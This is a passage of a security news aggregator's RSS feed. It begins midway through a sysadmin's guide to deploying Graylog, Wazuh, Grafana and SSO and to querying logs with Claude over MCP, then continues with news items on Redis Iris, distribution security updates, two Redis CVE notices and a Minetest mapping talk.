false<br>sync_ttl = 3600<br>whitelist = 127.0.0.1</pre><pre># /etc/nginx/sites-enabled/grafana - Enable<br><br>auth_request /oauth2/auth;</pre><pre># Apply changes<br><br>systemctl restart grafana-server nginx</pre><blockquote><em>⚠</em><strong><em> Important:</em></strong><em> </em>For security reasons, replace the default password for the user “admin”.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*LlADIl-n2kYp6S5O.png"></figure><h3>Graylog Ingest: Configuring Data Ingest from Fluent Bit</h3><p><strong><em>Part 12</em></strong></p><p>With all components installed and SSO authentication configured, it’s time to connect the final wires: configure Graylog to receive the events that Fluent Bit sends from Wazuh, and activate all services so that the platform is fully operational.</p><p>Fluent Bit sends Wazuh events to “localhost:5555” in JSON format. Graylog needs an active input listening on that port to process them.</p><p><strong>Option A — Web interface:<br></strong>https://graylog.&lt;domain.com&gt;/system/inputs</p><ul><li>Select input type: Raw HTTP</li><li>Click “Launch new input”</li><li>Configure:<br><strong> </strong>Title<strong>:</strong> Wazuh<br><strong>Bind address:</strong> 127.0.0.1</li><li>Click “Launch Input”</li><li>Follow the wizard to start the input and verify your diagnosis.</li></ul><p><strong>Option B — API:</strong></p><pre># Create RAW HTTP input - Graylog admin credential<br><br>curl -X POST "http://localhost:9000/api/system/inputs" \<br>-H "Content-Type: application/json" \<br>-H "X-Requested-By: cli" \<br>-u "admin:&lt;password&gt;" \<br>-d '{<br>  "title": "Wazuh",<br>  "type": "org.graylog2.inputs.raw.http.RawHttpInput",<br>  "global": true,<br>  "configuration": {<br>    "bind_address": "127.0.0.1",<br>    "port": 5555,<br>    "recv_buffer_size": 1048576,<br>    "max_chunk_size": 65536<br>  }<br>}'</pre><blockquote>bind_address: 127.0.0.1 limits listening to the local interface — Fluent Bit runs on the same server, so there’s no need to expose the port externally.</blockquote><blockquote>Standard configuration uses the default stream.</blockquote><p>— — — end options</p><p>With the platform fully configured, we enable automatic service startup and start Fluent Bit to begin receiving events:</p><pre>systemctl enable fluent-bit mongod graylog-server grafana-server oauth2-proxy<br>systemctl start fluent-bit</pre><p>Order matters: MongoDB must be running before Graylog, and OAuth2-Proxy before Nginx. The “enable” command ensures that systemd respects dependencies on future server restarts.</p><p><strong>Verification: Is everything Working?</strong></p><p>Once all services are active, verify the complete flow:</p><ol><li><strong>Fluent Bit is reading Wazuh alerts</strong>:<br><em>tail -f /log/fluent-bit/td-agent-bit.log</em><br>You should see error-free processing lines.</li><li><strong>Graylog is receiving messages</strong>: In the web interface, navigate to Search and verify that messages with the source “wazuh” are arriving.</li><li><strong>SSO Authentication</strong>: Access <a href="https://site.domain.com/">https://site.domain.com</a> from your browser — it should redirect you to the IdP and then return authenticated.</li><li><strong>Grafana connected to Wazu</strong>h: In Grafana, configure a data source pointing to Wazuh and verify that it returns data.</li></ol><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*_yPCjCev-1VHORsJ.png"></figure><h3>Graylog MCP + Claude: Querying Security Logs in Natural Language with AI</h3><p><strong><em>Part 13</em></strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*zafoeeMeYUR77NUv3B4o3w.jpeg"></figure><p>This is the most groundbreaking article in the series. The platform is already operational: Wazuh detects threats, Fluent Bit transports events, Graylog indexes them, and Grafana visualizes them. But there’s an additional layer that completely changes how we interact with security data: <strong>integrating Claude as an AI client on the Graylog REST API — MCP is more than an API; it’s a Bridge</strong>.</p><p><strong>What is MCP and why does it matter?<br></strong>MCP (Model Context Protocol) is a protocol that allows language models like Claude to connect directly with external tools and data sources. In this case, Graylog exposes its API as an MCP server, and Claude acts as an intelligent client that can query, filter, and analyze security logs.</p><p><strong>The change this produces is significant</strong>:</p><ul><li>Instead of building queries in the Graylog interface, the analyst writes in natural language: “<strong>Were there any failed login attempts in the last 2 hours?</strong>”</li><li>Instead of reviewing hundreds of log lines, Claude summarizes the relevant patterns and presents them in context.</li><li>Non-technical users — operators without SIEM experience — can interact directly with the security data.</li><li>Every query is logged in Graylog like any other API interaction, maintaining complete traceability.</li></ul><p><strong>Architecture of integration</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/325/1*S0hueQdlC9DM7gMt2rQ4IA.jpeg"></figure><p>A specific virtual host was created in Nginx “graylog-mcp” without OAuth2-Proxy — Claude authenticates directly with Basic credentials encoded in base64.</p><h3>Installation</h3><p><strong>On the client:</strong></p><ol><li><strong>NodeJS:</strong> <a href="https://nodejs.org/en/download">https://nodejs.org/en/download</a></li><li><strong>Claude Desktop:</strong> <a href="https://claude.com/download">https://claude.com/download</a></li></ol><h3>Configuration in Graylog</h3><p><strong>Step 1: Enable MCP in Graylog</strong></p><p>https://graylog.&lt;domain.com&gt;/system/configurations/MCP</p><p><strong>Step 2: Create a user token</strong></p><p>Navigate to https://graylog.&lt;domain.com&gt;/system/users → Actions → More → Edit tokens.</p><ul><li>Token Name: &lt;name&gt;</li><li>Token TTL: &lt;time&gt;</li></ul><blockquote>TTL Syntax Examples: for 60 seconds: PT60S, for 60 minutes: PT60M, for 24 hours: PT24H, for 30 days: P30D</blockquote><p><strong>Step 3: Base64 Encoding of Credentials</strong></p><p>The format is "&lt;token&gt;:token” encoded in base64.</p><pre>echo -n "&lt;token&gt;:token" | base64</pre><h3>Claude Desktop Configuration</h3><p>Edit the “claude_desktop_config.json” file in Claude Desktop, usually located in "%APPDATA%\CLAUDE\".</p><pre>{<br>  "mcpServers": {<br>    "Graylog": {<br>      "command": "C:\\Program Files\\nodejs\\npx",<br>      "args": [<br>        "mcp-remote",<br>        "https://graylog-mcp.&lt;domain.com&gt;/mcp",<br>        "--header",<br>        "Authorization: Basic &lt;credential_b64&gt;"<br>      ]<br>    }<br>  }<br>}</pre><blockquote>Replace <em>&lt;domain.com&gt;</em> with your actual domain and <em>&lt;credential_b64&gt;</em> with the base64 value generated in the previous step.</blockquote><p>Restart Claude Desktop and check the connection status in: <br><strong>Settings → Developer</strong></p><blockquote>The state should be running or refer to the logs.</blockquote><figure><img alt="" src="https://cdn-images-1.medium.com/max/982/1*zf7ollrjFRmyHYCdc_h86w.jpeg"></figure><h3>Real-world use cases</h3><p>Once connected, Claude can answer questions such as:</p><ul><li>“How many critical alerts did Wazuh generate today?”</li><li>“Are there any IPs that repeatedly attempted to connect without success?”</li><li>“Summarize the events of the last 30 minutes”</li><li>“Which services experienced errors in the last 6 hours?”</li></ul><p>The response is not a list of raw logs — it’s a natural language analysis with relevant patterns identified and contextualized.</p><h3>Security considerations</h3><ul><li>Access to graylog-mcp is restricted to HTTPS with a valid certificate.</li><li>Base64-encoded credentials are NOT encrypted — they are only encoded. True security lies in TLS and ensuring the endpoint is only accessible from the corporate network.</li><li>Every request from Claude is logged in the Graylog access log, maintaining a complete audit trail.</li><li>Rotating the token periodically is a best practice.</li></ul><figure><img alt="" src="https://cdn-images-1.medium.com/max/700/0*7AWAjKALkSFXqCSq.png"></figure><h3>Final Architecture, evidences, and Conclusions: An Open Source Security Platform in Production</h3><p><strong><em>Part 14</em></strong></p><p>This is the final article in the series. After thirteen articles covering each component of the stack — from Wazuh to integration with Claude via MCP — it’s time to see the big picture and reflect on what worked, and what cost more than expected.</p><p><strong>Wazuh</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/969/1*G6ujNdCoZjnmY0KGutYgNA.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*u3VN36Y05Vkaht3BXX6GEg.jpeg"></figure><p><strong>Graylog</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*2Nq4JG1ZvNYDUTqWPnv7Rg.jpeg"></figure><p><strong>Grafana</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*r6nrI73XCYVg_nZxowlhsQ.jpeg"></figure><p><strong>Claude</strong></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*oUVy7cQSqs-d1XaWjqPVaw.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/743/1*gSsxbeKhCf35sRQ6aouAlg.jpeg"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/740/1*xa9tIbOpgwLipnlUrvmV3g.jpeg"></figure><h3>The Complete Architecture</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*vmW0rU3czxIzuIfjyuSisw.jpeg"></figure><p>The diagram shows two main flows that coexist on the platform:</p><h3>Data Flow</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/618/1*SLgK1QVdKfN8UV1mCvb1mA.jpeg"></figure><p>Wazuh detects events and writes them in JSON format. Fluent Bit continuously reads this file and forwards each event to Graylog via TCP. Graylog indexes the data to Wazuh Indexer (returns the connection to OpenSearch). Grafana connects to Wazuh as a data source for dashboards. Claude accesses the Graylog MCP Bridge for natural language queries.</p><h3>Authentication Flow</h3><figure><img alt="" src="https://cdn-images-1.medium.com/max/532/1*-0uEx_oWBnDzzvJ60tbKnw.jpeg"></figure><p>The user accesses any of the three systems with their corporate account. Nginx queries OAuth2-Proxy on each request. OAuth2-Proxy validates the session (stored in Redis) or redirects to IdP for authentication. Once authenticated, Nginx propagates the username as an HTTP header to the corresponding application.</p><h3>Lessons Learned</h3><p><strong>What worked well:</strong></p><ul><li><strong>Separate LVM volumes</strong> — the best implementation decision. On three occasions, logs grew larger than expected; none of these affected the operating system or application data.</li><li><strong>Single authentication point</strong> — after the initial (and complex) setup, the user experience is seamless. One login for three systems.</li><li><strong>Fluent Bit vs. Filebeat</strong> — Fluent Bit’s resource consumption is significantly lower. On a shared server, this matters.</li><li><strong>Graylog MCP + Claude</strong> — the most differentiating component. It completely changed how non-technical users interact with security data.</li></ul><p><strong>What cost more than expected</strong>:</p><ul><li><strong>TLS between Graylog and Wazuh Indexer</strong> — the JKS and CA certificate import is the step with the most incorrect documentation online. The guide in this article reflects what actually works.</li><li><strong>Order of operations in Authentication</strong> — configuring the authentication proxy before creating users results in loss of access. The order matters.</li></ul><h3>Is it worth it?</h3><p>For an organization that wants true visibility into its infrastructure without paying for commercial SIEM tool licenses (which can cost tens of thousands of dollars annually), the answer is yes.</p><p>The real cost is implementation time and technical expertise. This well-documented stack can be replicated in a single workday using this guide. The necessary technical knowledge includes Linux administration, basic TLS concepts, and reading the official documentation.</p><p>What you get in return is a security platform with features comparable to commercial solutions, complete control over your data, no vendor lock-in, and the ability to extend it with any component you need.</p><h3>About this series</h3><p>This implementation was carried out in production for the IT Infrastructure. All documentation reflects real decisions, real problems, and solutions that work in production.</p><p>If you have questions, found a bug, or want to share an improvement, the comments are open.</p><blockquote><strong><em>Your Turn — Operational Ownership</em></strong></blockquote><blockquote>From here, the real value comes from how you adapt it to your environment. As the operator or administrator, the next layer is yours to build:</blockquote><blockquote><strong><em>Graylog:</em></strong> Create dedicated indexes and streams per data source; build a JSON extractor for the message field to enable structured search.</blockquote><blockquote><strong><em>Vulnerability visibility:</em></strong><em> </em>A custom script can reindex Wazuh’s vulnerability summary index and inject it into Graylog via a new GELF HTTP input — all through the APIs — making vulnerability summaries available in Grafana dashboards .</blockquote><blockquote><strong><em>Alerting and reporting:</em></strong> Define alert conditions and scheduled reports based on what matters to your organization.</blockquote><blockquote><strong><em>Grafana dashboards:</em></strong> Design views tailored to what your team or clients actually need to see.</blockquote><blockquote><strong><em>API automation:</em></strong> Build scripts to automate recurring calls across the stack.</blockquote><blockquote><strong><em>Threat intelligence:</em></strong> Cross-reference events with NIST NVD and CISA KEV for deeper context and custom correlations.</blockquote><blockquote>If you have questions or need guidance on the operational side, feel free to reach out — happy to support within my availability.</blockquote><p><strong>Author:</strong><em> Antonio Valenzuela Serra </em><strong><em>— </em></strong><em>SysAdmin </em><strong><em>— </em></strong><em>Chile </em><strong><em>— </em></strong><em>May 2026\</em></p><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=c08d1b412f37" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/open-source-security-platform-for-it-infrastructure-centralizing-threat-detection-logs-and-sso-c08d1b412f37">Open Source Security IT Platform: Threat Detection, Logging, Alerts, AI and SSO integration.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Context architecture is replacing RAG as agentic AI pushes enterprise retrieval to its limits]]></title>
<description><![CDATA[Redis built its name as the caching layer that kept web applications from collapsing under load. The problem it is targeting now has the same structure but is harder to solve: production AI agents failing not because the models are wrong, but because the data underneath them is scattered, stale a...]]></description>
<link>https://tsecurity.de/de/3527508/it-nachrichten/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3527508/it-nachrichten/context-architecture-is-replacing-rag-as-agentic-ai-pushes-enterprise-retrieval-to-its-limits/</guid>
<pubDate>Tue, 19 May 2026 02:02:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Redis built its name as the caching layer that kept web applications from collapsing under load. The problem it is targeting now has the same structure but is harder to solve: production AI agents failing not because the models are wrong, but because the data underneath them is scattered, stale and structured for humans rather than machines. Retrieval pipelines built for single queries cannot absorb the volume agents generate.</p><p>The gap Redis is targeting is structural: agents make orders of magnitude more data requests than human users, but most retrieval layers were built for the human-scale problem. Redis Iris, launched Monday, is the company's answer: a context and memory platform that sits between an agent and the data it needs to act. The platform combines real-time data ingestion, a semantic interface that auto-generates MCP tools from business data models, and an agent memory server built on Redis Flex, a rewritten storage engine that runs 99% of data on flash at a tenth of the cost of in-memory storage alone.</p><p>The announcement lands as enterprise RAG infrastructure is in active transition.<a href="https://venturebeat.com/data/the-retrieval-rebuild-why-hybrid-retrieval-intent-tripled-as-enterprise-rag-programs-hit-the-scale-wall"> <u>VentureBeat's Q1 2026 VB Pulse</u></a> RAG Infrastructure Market Tracker found buyer intent to adopt hybrid retrieval tripling from 10.3% to 33.3% between January and March. Retrieval optimization surpassed evaluation as the top enterprise investment priority for the first time. Custom in-house retrieval stacks rose from 24.1% to 35.6% as enterprises outgrew off-the-shelf options. Redis is not the only infrastructure vendor reading those signals — several data platform providers have repositioned around agent context layers in recent weeks.</p><p>The scale mismatch is the structural argument behind the launch. 

"Companies will have orders of magnitude more agents than human beings," Rowan Trollope, CEO of Redis, told <i>VentureBeat</i>. "Orders of magnitude more agents than human beings means orders of magnitude more load on back end systems."</p><h2>From cache to context</h2><p>Trollope traces the parallel back to the mobile era: When legacy backends built for branch tellers suddenly had to serve a million smartphone users, Redis became the caching layer that absorbed the load without a full rebuild.</p><p>What is different this time is that agents cannot write their own middleware. In the mobile era, a developer would sit with a database administrator, identify the queries an application needed and hard-code the caching logic into a middleware layer. Agents cannot do that. They need to find the right data at runtime, through interfaces built for them in advance, or they stall.</p><p>"This is like the analogy of the grocery store in the fridge," he said. "If every time you have to go make your sandwich, you have to run to the grocery store to get the food, that's not very efficient. You put a fridge in every house, you store a little bit of food there. And that's kind of where we still tend to exist in the infrastructure stack."</p><h2>What Redis Iris includes</h2><p>Iris ships five components that together cover data ingestion, semantic access, memory and caching.</p><p><b>Redis Data Integration.</b> Now in general availability. RDI uses change data capture pipelines to sync data from relational databases, warehouses and document stores into Redis continuously, with connectors for Oracle, Snowflake, Databricks and Postgres.</p><p><b>Context Retriever.</b> Now in preview. Developers define a semantic model of business data using pydantic models and Redis auto-generates MCP tools agents use to query it directly, with row-level access controls enforced server-side. Trollope describes the shift from classic RAG as a directional inversion. "It's just a flip to let the agent pull the data instead of presupposing and stuffing it into the pipeline," he said.</p><p><b>Agent Memory</b>. Now in preview. Stores short and long-term state across sessions so agents carry context without re-deriving it on each turn.</p><p><b>Redis Flex</b>. A rewritten storage engine that runs 99% of data on SSDs and 1% in RAM, delivering petabyte-scale retrieval at sub-millisecond latencies.</p><p><b>Redis Search and LangCache</b>. The retrieval and semantic caching backbone underneath the platform. LangCache reduces redundant model calls by caching prompt responses.</p><h2>What analysts say</h2><p>The data industry is generally heading in the same direction now. Every major database vendor is making a context layer argument. </p><p>Traditional database vendors<a href="https://venturebeat.com/data/oracle-converges-the-ai-data-stack-to-give-enterprise-agents-a-single"> <u>including Oracle</u></a> are integrating context and memory layers to bring relational databases into the agentic AI era. Purpose-built vector database vendors including<a href="https://venturebeat.com/data/the-rag-era-is-ending-for-agentic-ai-a-new-compilation-stage-knowledge-layer-is-what-comes-next"> <u>Pinecone</u></a><u> </u>are doing the same, building out a new knowledge layer for agentic AI context. Standalone context layers like<a href="https://venturebeat.com/data/with-91-accuracy-open-source-hindsight-agentic-memory-provides-20-20-vision"> <u>Hindsight</u></a> are also part of the emerging landscape.</p><p>Trollope frames Redis's position as structurally different from that competition.</p><p>"For us to win, no one else has to lose," he said. Many Redis deployments already run MongoDB or Oracle as the backend system of record. Iris reflects and caches from those systems rather than displacing them. Redis is launching Iris in the Snowflake marketplace with native connectors.</p><p>Stephanie Walter, Practice Leader for AI Stack at HyperFRAME Research, puts the market context plainly. "The market is converging on the same conclusion: agents don't just need more tokens or better models. They need governed, current, low-latency context," Walter said.</p><p>Her read on Redis's differentiation focuses on where Redis already sits in the stack, which is close to runtime, latency-sensitive operational state, and real-time data., </p><p>"The pitch is not 'better RAG' as much as 'agents need live context, memory, and fast retrieval while they are actually working," she said.</p><p>Whether it's Redis or another vendor, every context layer technology will face a governance challenge to be successful.</p><p>"Agentic AI will not scale in the enterprise if every agent becomes a new cost center, a new data access risk, and a new governance exception," she said. "The winning context layers will be the ones that make agents faster, cheaper, and safer to run."</p><h2>For real-time clinical AI, getting context wrong is not an option</h2><p>Mangoes.ai is one company that has already had to answer those questions in production, under conditions where the cost of getting context wrong is measured in patient outcomes.</p><p>Amit Lamba, founder and CEO of Mangoes.ai, runs a real-time voice AI platform deployed across large healthcare facilities where patients and clinicians ask live questions about treatment, scheduling and case history. Mangoes.ai built its stack natively on Redis from the start. </p><p>"Retrieval, memory, and session state all run through Redis, so we're not stitching together separate tools and hoping they talk to each other," Lamba said.</p><p>The problem Iris's dynamic memory capability addresses is what happens across a complex session.</p><p> "Think about a one-hour group therapy session," Lamba said. "You need to know who said what, when, and be able to surface the right information to the therapist in the moment. That's not a simple retrieval problem."</p><p>The platform runs multiple specialized agents in parallel, one for entity identification, one for relationship reasoning and one for integrating case history. 

"The dynamic memory capability maps almost perfectly to the problem we're solving," Lamba said.</p><h2>What this means for enterprises</h2><p>For enterprises that built their AI stack around RAG, the retrieval layer that got them to production is no longer enough to keep them there

<b>The RAG era is giving way to context architecture. </b>The classic RAG model pushed data into the agent before the model was called. Production deployments are flipping that: agents pull what they need at runtime through tool calls, treating the data layer as a live resource rather than a pre-loaded payload. Teams still optimizing RAG pipelines are solving last year's problem.</p><p><b>The semantic layer is now production infrastructure.</b> The model that defines business entities, their relationships and the access rules between them needs to be built, versioned and maintained with the same discipline as a data pipeline. Most organizations have not staffed or structured for that work. The enterprises that define their context architecture now are the ones that will not have to rebuild it when agent workloads scale.</p><p><b>Budget is already moving.</b> VB Pulse Q1 2026 data shows retrieval optimization investment rising from 19% to 28.9% across the quarter, overtaking evaluation spending for the first time. Organizations that spent the previous year measuring their retrieval quality are now spending to fix it. The context layer is an active procurement decision, not a roadmap item.</p><p>"The first buyer question should not be 'Do I need a vector database, long context, memory, or a context engine?' It should be 'What does this agent need to know, how fresh must that knowledge be, who is allowed to access it, and what does every retrieval cost?'" Walter said.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (freerdp, gimp:2.8, jq, kernel, and rsync), Debian (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), Fedora (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, ngi...]]></description>
<link>https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3526095/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 18 May 2026 15:26:52 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (freerdp, gimp:2.8, jq, kernel, and rsync), <b>Debian</b> (chromium, ffmpeg, firewalld, kernel, nginx, openjpeg2, openssh, php7.4, and redis), <b>Fedora</b> (apptainer, chromium, coturn, dnsmasq, firefox, kernel, libgit2_1.8, libmetal, nginx, nginx-mod-brotli, nginx-mod-fancyindex, nginx-mod-headers-more, nginx-mod-js-challenge, nginx-mod-modsecurity, nginx-mod-naxsi, nginx-mod-vts, open-amp, perl-Net-CIDR-Lite, pgbouncer, pypy, python-jupytext, python-uv-build, rsync, rust-astral-tokio-tar, uriparser, uv, valkey, and yelp), <b>Mageia</b> (dpkg, firefox, thunderbird, golang, haproxy, and samba), <b>Slackware</b> (dnsmasq and kernel), and <b>SUSE</b> (apache-commons-configuration2, apache2, apptainer, chromedriver, cups-filters, curl, dnsmasq, expat, ffmpeg-4, ffmpeg-7, firebird, firewalld, flux2-cli, glibc, go1.25, go1.26, gosec, grub2, ImageMagick, java-11-openj9, java-17-openj9, java-1_8_0-openj9, java-1_8_0-openjdk, java-21-openj9, java-25-openj9, kdenlive, kernel, kernel-devel, keylime-config, krb5, libIex-3_4-33, mozjs115, mozjs78, nginx, openssh, openvswitch, ovmf, PackageKit, perl-Crypt-URandom, perl-CryptX, perl-libwww-perl, perl-Net-CIDR-Lite, perl-Text-CSV_XS, podman, postgresql17, postgresql18, python-pyOpenSSL, python310, rsync, sed, tekton-cli, valkey, xen, and zypper-docker).]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-25243 | Redis up to 8.6.2 heap-based overflow (GHSA-c8h9-259x-jff4 / Nessus ID 315122)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Redis up to 8.6.2. The impacted element is an unknown function. Such manipulation leads to heap-based buffer overflow.

This vulnerability is traded as CVE-2026-25243. The attack may be launched remotely. There is no exploit available.

Upgradin...]]></description>
<link>https://tsecurity.de/de/3525049/sicherheitsluecken/cve-2026-25243-redis-up-to-862-heap-based-overflow-ghsa-c8h9-259x-jff4-nessus-id-315122/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3525049/sicherheitsluecken/cve-2026-25243-redis-up-to-862-heap-based-overflow-ghsa-c8h9-259x-jff4-nessus-id-315122/</guid>
<pubDate>Mon, 18 May 2026 08:53:48 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/redis">Redis up to 8.6.2</a>. The impacted element is an unknown function. Such manipulation leads to heap-based buffer overflow.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-25243">CVE-2026-25243</a>. The attack may be launched remotely. There is no exploit available.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Zwei Probleme in redis (Debian)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3524337/unix-server/security-zwei-probleme-in-redis-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3524337/unix-server/security-zwei-probleme-in-redis-debian/</guid>
<pubDate>Sun, 17 May 2026 22:45:39 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-42586 | Redis Codec Encoder crlf injection (Nessus ID 314899)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, has been found in Redis. This affects an unknown function of the component Codec Encoder. This manipulation causes crlf injection.

This vulnerability is handled as CVE-2026-42586. It is possible to launch the attack on the local host. There is n...]]></description>
<link>https://tsecurity.de/de/3518762/sicherheitsluecken/cve-2026-42586-redis-codec-encoder-crlf-injection-nessus-id-314899/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3518762/sicherheitsluecken/cve-2026-42586-redis-codec-encoder-crlf-injection-nessus-id-314899/</guid>
<pubDate>Fri, 15 May 2026 09:23:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, has been found in <a href="https://vuldb.com/product/redis">Redis</a>. This affects an unknown function of the component <em>Codec Encoder</em>. This manipulation causes crlf injection.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-42586">CVE-2026-42586</a>. It is possible to launch the attack on the local host. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Thursday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (gimp, jq, and yggdrasil), Debian (nghttp2 and thunderbird), Fedora (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), Mageia (dnsmasq, flatpak, kernel, ...]]></description>
<link>https://tsecurity.de/de/3516829/linux-tipps/security-updates-for-thursday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3516829/linux-tipps/security-updates-for-thursday/</guid>
<pubDate>Thu, 14 May 2026 15:13:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (gimp, jq, and yggdrasil), <b>Debian</b> (nghttp2 and thunderbird), <b>Fedora</b> (chromium, firefox, freerdp, GitPython, kernel, kernel-headers, krb5, nano, nix, nodejs20, php, python-click, python-django5, SDL2_image, and xen), <b>Mageia</b> (dnsmasq, flatpak, kernel, kmod-virtualbox, kernel-linus, perl-Net-CIDR-Lite, perl-XML-LibXML, and redis), <b>SUSE</b> (dnsmasq, firefox, jupyter-jupyterlab, kernel, krb5, libvinylapi3, log4j, Mesa, mozjs60, NetworkManager, OpenImageIO, python-Mako, python-Pillow, and python39), and <b>Ubuntu</b> (dnsmasq and nginx).]]></content:encoded>
</item>
<item>
<title><![CDATA[MTSatellite (fossgis2015)]]></title>
<description><![CDATA[Der Vortrag stellt die Freie Software MTSatellite vor, ein Live-Webmapping System für das Open World/Sandbox-Spiel Minetest. Der Vortrag führt das System vor und gibt eine teils vertiefende Übersicht über die eingesetzen Technologien sowohl aus GIS- als auch aus Sicht eines passionierten Minetest...]]></description>
<link>https://tsecurity.de/de/3515052/it-security-video/mtsatellite-fossgis2015/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3515052/it-security-video/mtsatellite-fossgis2015/</guid>
<pubDate>Wed, 13 May 2026 23:17:58 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Vortrag stellt die Freie Software MTSatellite vor, ein Live-Webmapping System für das Open World/Sandbox-Spiel Minetest. Der Vortrag führt das System vor und gibt eine teils vertiefende Übersicht über die eingesetzen Technologien sowohl aus GIS- als auch aus Sicht eines passionierten Minetest-Spielers.

Der Vortrag stellt die Freie Software MTSatellite [1] vor,
ein Live-Webmapping System für das Open World/Sandbox-Spiel Minetest [2].

Minetest ist eine Freie Software Alternative zum bekannten
Spiel Minecraft. Es simuliert große interaktive 3D-Welten aus
Klötzchen, in denen man seiner Kreativität auch kooperativ mit vielen
Spielern gleichzeitig freien Lauf lassen kann.

Um einen zeitnahen Überblick über die Veränderung in diesen Welten zu bekommen, wurde die Kartenanwendung MTSatellite geschaffen:
Man kann über das Spiel in der simulierten Welt etwas verändern und hat quasi zeitgleich eine Karte im Web, die diese Änderung dokumentiert.

Basierend auf einer eigens implementierten fraktal räumlich indizierten Redis/LevelDB [5] 3D-Datenbank, die als Backend an den Spiel-Server angeschlossen wird, wurde mit Hilfe einer in serverseitigen Rendering-Komponente und einem browser-seitigen Leaflet-Client [6] eine Lösung erstellt, die diese Anforderung erfüllt.

Zur effizienten Verarbeitung der zu analysierenden Datenmengen wurde das System in der Programmiersprache Go [7] geschrieben. Diese erleichtert die Entwicklung von skalierenden, verteilten und performanten Anwendungen sehr.

Einen Einblick in die Funktionsweise aus Anwendungssicht verschafft das Video [3].
Eine Live-Welt lässt sich unter anderen unter [4] betrachten.

Der Vortrag führt das System vor und gibt eine teils vertiefende Übersicht über die eingesetzen Technologien sowohl aus GIS- als auch aus Sicht eines passionierten Minetest-Spielers.
about this event: https://fossgis-konferenz.de/2015/programm/events/852.de.html]]></content:encoded>
</item>
<item>
<title><![CDATA[Patch Tuesday - May 2026]]></title>
<description><![CDATA[Microsoft is publishing 137 vulnerabilities on May 2026 Patch Tuesday. Microsoft is not aware of exploitation in the wild or public disclosure for any of these vulnerabilities. So far this month, Microsoft has provided patches to address 133 browser vulnerabilities, which are not included in the ...]]></description>
<link>https://tsecurity.de/de/3512237/it-security-nachrichten/patch-tuesday-may-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3512237/it-security-nachrichten/patch-tuesday-may-2026/</guid>
<pubDate>Wed, 13 May 2026 03:53:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
